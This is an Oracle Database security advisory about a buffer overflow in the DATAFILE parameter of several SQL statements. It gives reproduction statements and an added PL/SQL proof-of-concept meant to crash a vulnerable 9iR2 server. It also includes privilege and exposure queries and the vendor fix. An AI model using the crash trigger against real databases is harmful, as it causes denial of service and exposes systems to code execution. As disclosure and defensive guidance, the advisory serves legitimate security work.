#21 - Buffer overflow on DATAFILE parameter
August 31, 2004
Credit: These vulnerabilities were researched and discovered by Cesar Cerrudo of Application Security, Inc.
Risk level: Low
Details:
Oracle Database Server accepts a data file name in several SQL statements that create or extend storage: creating a database or tablespace, allocating an extent to an index or cluster, bringing a data file online, and so on. When an overly long string is passed as the DATAFILE parameter, a buffer overflow occurs.
To reproduce the overflow, execute any of the following SQL statements, substituting a long string for 'longstringhere':
ALTER DATABASE datafile 'longstringhere' ONLINE;
or
ALTER INDEX indexname allocate extent(datafile 'longstringhere');
or
CREATE TABLESPACE tablespacename DATAFILE 'longstringhere';
or
ALTER CLUSTER clustername allocate extent(datafile 'longstringhere');
or
etc.
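The statements above can be driven from a PL/SQL block that builds the long DATAFILE value instead of pasting it by hand. This is an added example, not code from the original advisory; the string length is an assumption (the advisory does not state the threshold) and the table and index names are placeholders. It exercises the ALTER INDEX path because that needs no system privilege beyond owning an index. Run it only against a disposable test instance: on a vulnerable 9iR2 build it is expected to kill the server process.

```sql
-- Added example, not part of the original advisory.
-- Assumptions: the current user can CREATE TABLE/INDEX in its own schema;
-- the overflow triggers somewhere below Oracle's 4000-byte SQL literal limit
-- (longer literals are rejected with ORA-01704 before DATAFILE is parsed).
SET SERVEROUTPUT ON

-- Placeholder objects so the session owns an index it may ALTER.
CREATE TABLE ovf_probe_t (x NUMBER);
CREATE INDEX ovf_probe_i ON ovf_probe_t (x);

DECLARE
  -- Assumed length; adjust upward toward 4000 if no crash is observed.
  str_len   PLS_INTEGER := 2000;
  long_name VARCHAR2(32767);
  stmt      VARCHAR2(32767);
BEGIN
  long_name := RPAD('A', str_len, 'A');

  -- Statement from the advisory: ALTER INDEX ... ALLOCATE EXTENT (DATAFILE ...).
  -- Single quotes inside the literal are doubled for the dynamic SQL string.
  stmt := 'ALTER INDEX ovf_probe_i ALLOCATE EXTENT (DATAFILE ''' ||
          long_name || ''')';

  EXECUTE IMMEDIATE stmt;
  DBMS_OUTPUT.PUT_LINE('Statement accepted (unexpected on a vulnerable build).');
EXCEPTION
  WHEN OTHERS THEN
    -- A normal ORA- error here means the parser rejected the value cleanly,
    -- which is the behaviour of a patched server.
    DBMS_OUTPUT.PUT_LINE('Server rejected the value: ' || SQLERRM);
END;
/

-- Clean up the placeholder objects (only reached if the session survived).
DROP INDEX ovf_probe_i;
DROP TABLE ovf_probe_t;
```

If the server process crashes, the exception handler never runs; the client instead loses its session with ORA-03113 (end-of-file on communication channel) or ORA-03114 (not connected to ORACLE), which is the denial-of-service outcome described in the Analysis section.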
Analysis:
This vulnerability can be reached through several statements, each with its own privilege requirement:
- using ALTER INDEX: any user who owns an index in their own schema, and users with the ALTER ANY INDEX system privilege
- using ALTER DATABASE: users with the ALTER DATABASE system privilege
- using CREATE TABLESPACE: users with the CREATE TABLESPACE system privilege
- using ALTER CLUSTER: any user who owns a cluster in their own schema, and users with the ALTER ANY CLUSTER system privilege
Successful exploitation allows an attacker to execute arbitrary code with the privileges of the Oracle server process. It can also be used for denial of service (DoS), since the overflow crashes the Oracle server process.
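Because the lowest-privilege path only requires owning an index or cluster, an administrator assessing exposure needs to know both who holds the listed system privileges (directly or through a role chain) and which schemas own indexes or clusters. The following data-dictionary queries are an added example, not part of the original advisory; they use the standard DBA_SYS_PRIVS, DBA_ROLE_PRIVS, DBA_USERS, DBA_INDEXES and DBA_CLUSTERS views and must be run by an account that can read them (for example a DBA account). The SYS/SYSTEM exclusion is an assumption made to keep the output focused on application accounts.

```sql
-- Added example, not part of the original advisory.
-- 1. Direct holders of the four system privileges named in the Analysis section.
--    GRANTEE may be a user or a role.
SELECT grantee, privilege, admin_option
  FROM dba_sys_privs
 WHERE privilege IN ('ALTER DATABASE', 'CREATE TABLESPACE',
                     'ALTER ANY INDEX', 'ALTER ANY CLUSTER')
 ORDER BY privilege, grantee;

-- 2. Users who reach one of those privileges through a role (roles can be
--    granted to roles, so walk the DBA_ROLE_PRIVS hierarchy with CONNECT BY).
--    Starts from every role that directly holds a listed privilege and
--    follows grants of that role outward until a real user is reached.
SELECT DISTINCT grantee AS username, granted_role AS via_role, LEVEL AS depth
  FROM dba_role_privs
 WHERE grantee IN (SELECT username FROM dba_users)
 START WITH granted_role IN (SELECT grantee
                               FROM dba_sys_privs
                              WHERE privilege IN ('ALTER DATABASE',
                                                  'CREATE TABLESPACE',
                                                  'ALTER ANY INDEX',
                                                  'ALTER ANY CLUSTER'))
CONNECT BY PRIOR grantee = granted_role
 ORDER BY username, via_role;

-- 3. Schemas that own an index or a cluster: these owners need no system
--    privilege at all to issue ALTER INDEX / ALTER CLUSTER ... ALLOCATE EXTENT
--    against their own objects, so every such account is an attack vector.
SELECT owner, 'INDEX' AS object_type, COUNT(*) AS object_count
  FROM dba_indexes
 WHERE owner NOT IN ('SYS', 'SYSTEM')   -- assumed exclusion, adjust to taste
 GROUP BY owner
UNION ALL
SELECT owner, 'CLUSTER' AS object_type, COUNT(*) AS object_count
  FROM dba_clusters
 WHERE owner NOT IN ('SYS', 'SYSTEM')
 GROUP BY owner
 ORDER BY 1, 2;
```

Query 2 deliberately filters to rows whose GRANTEE is a user, because DBA_ROLE_PRIVS lists grants to roles as well; the DBA role holds all four privileges, so expect every DBA-role holder to appear. Any account surfaced by query 3 that is also reachable from the network should be treated as able to crash the server until the patch in the Vendor Fix section is applied.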
Vendor Fix:
Fixed in Oracle 9iR2 Patchset 4 (9.2.0.5) patch 2. Oracle 10g is not vulnerable.